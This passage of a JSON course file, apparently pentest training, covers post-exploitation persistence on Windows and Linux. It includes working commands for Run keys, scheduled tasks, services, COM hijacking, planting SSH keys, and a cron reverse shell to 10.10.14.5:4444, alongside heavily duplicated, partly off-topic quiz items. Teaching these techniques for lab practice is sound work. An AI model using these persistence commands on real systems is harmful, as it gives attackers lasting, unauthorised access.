accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"registry-persistence","cat":"Post-Exploitation","title":"Registry Persistence","diff":1,"xp":75,"intro":"Add payload to a Run key. Executes every login.","sections":[{"type":"text","content":"Registry Run keys execute programs at user login. HKCU doesn't need admin."},{"type":"code","lang":"powershell","content":"reg add HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /v Updater /t REG_SZ /d \"C:payload.exe\" /f"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Which hive persists for all users?","opts":["HKCU","HKLM","HKU","HKCR"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"schtask-persistence","cat":"Post-Exploitation","title":"Scheduled Task Persistence","diff":2,"xp":150,"intro":"Task runs on boot/login. Survives reboots.","sections":[{"type":"text","content":"Scheduled tasks are reliable persistence that survives reboots."},{"type":"code","lang":"cmd","content":"schtasks /create /tn Updater /tr \"C:payload.exe\" /sc onstart /ru SYSTEM"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"/sc onstart triggers when?","opts":["Daily","At boot","At logon","On idle"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"wmi-persistence","cat":"Post-Exploitation","title":"WMI Event Persistence","diff":3,"xp":250,"intro":"Subscribe to a system event, run payload when it fires.","sections":[{"type":"text","content":"WMI event subscriptions are stored in the WMI repository. Very stealthy, survive reboots."},{"type":"code","lang":"powershell","content":"# Create WMI filter + consumer + binding\n# Payload executes every 60 seconds, stored in WMI repository"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Where are WMI subscriptions stored?","opts":["Registry","WMI repository (OBJECTS.DATA)","Scheduled tasks","Services"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"com-hijacking","cat":"Post-Exploitation","title":"COM Object Hijacking","diff":3,"xp":200,"intro":"Replace a COM DLL. Code runs when the object is instantiated.","sections":[{"type":"text","content":"HKCU COM registrations take precedence over HKLM. Plant your DLL in the user's COM registration."},{"type":"code","lang":"powershell","content":"New-Item -Path 'HKCU:SoftwareClassesCLSID{clsid}InprocServer32' -Force\nSet-ItemProperty -Path '...' -Name '(default)' -Value 'evil.dll'"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why does HKCU COM take precedence?","opts":["It's newer","Windows checks per-user before machine-wide","HKLM is read-only","They're equal"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"startup-folder-persist","cat":"Post-Exploitation","title":"Startup Folder Persistence","diff":1,"xp":50,"intro":"Drop a shortcut in Startup. Simplest persistence.","sections":[{"type":"text","content":"Files in Startup folder run at login. Simple but easily discovered."},{"type":"code","lang":"cmd","content":"copy payload.exe \"%APPDATA%MicrosoftWindowsStart MenuProgramsStartup\\\""},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"When do Startup items run?","opts":["At boot","When user logs in","Every hour","On network connect"],"ans":1},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"service-creation-persist","cat":"Post-Exploitation","title":"Windows Service Persistence","diff":2,"xp":150,"intro":"Create a service that starts on boot as SYSTEM.","sections":[{"type":"text","content":"Windows services start automatically at boot under SYSTEM."},{"type":"code","lang":"cmd","content":"sc create Updater binPath= \"C:payload.exe\" start= auto obj= LocalSystem"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Services typically run as?","opts":["Administrator","SYSTEM","Guest","Current user"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ssh-key-persistence","cat":"Post-Exploitation","title":"SSH Key Persistence","diff":1,"xp":75,"intro":"Add your public key. Password-free access forever.","sections":[{"type":"text","content":"Adding your SSH key to authorized_keys gives persistent password-free access."},{"type":"code","lang":"bash","content":"ssh-keygen -t ed25519 -f ~/.ssh/persist\necho 'ssh-ed25519 AAAA...' >> /root/.ssh/authorized_keys"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SSH keys stored in?","opts":["sshd_config","~/.ssh/authorized_keys","known_hosts","/etc/passwd"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cron-persistence","cat":"Post-Exploitation","title":"Cron Persistence","diff":1,"xp":75,"intro":"Cron reverse shell every minute. Survives reboots.","sections":[{"type":"text","content":"Cron re-establishes the shell periodically even if it dies."},{"type":"code","lang":"bash","content":"(crontab -l; echo '* * * * * bash -i >& /dev/tcp/10.10.14.5/4444 0>&1') | crontab -"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"'* * * * *' runs how often?","opts":["Hourly","Every minute","Daily","Every second"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream 